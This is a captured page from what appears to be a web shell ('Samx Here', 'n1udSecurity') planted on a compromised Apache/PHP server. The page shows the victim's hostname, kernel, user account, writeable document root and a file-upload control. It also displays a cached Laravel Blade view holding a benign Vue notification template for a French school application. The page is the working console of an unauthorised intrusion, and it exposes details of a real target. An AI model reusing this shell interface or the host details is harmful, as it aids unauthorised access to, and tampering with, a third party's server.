Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/pragmaclasse_recette/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/pragmaclasse_recette/storage/framework/views/38bec0d1c8d78361221e743526f22cd9858d64a4.php
<div>
    <div v-for="(notifications, typeNotification) in notificationsProp" :class="typeNotification">
        <div class="notification" v-for="notification in notifications">
            <span class="text">{{notification.text}}</span>
            <div v-if="typeNotification == 'invitationClasse'">
                <button @click="invitationClasse(true, notification.params)">Accepter</button>
                <button @click="invitationClasse(false, notification.params)">Refuser</button>
            </div>
        </div>
    </div>
</div><?php /**PATH /home/pragmatice/pragmaclasse_recette/resources/views/components/account/teacher/notifications.blade.php ENDPATH**/ ?>

SAMX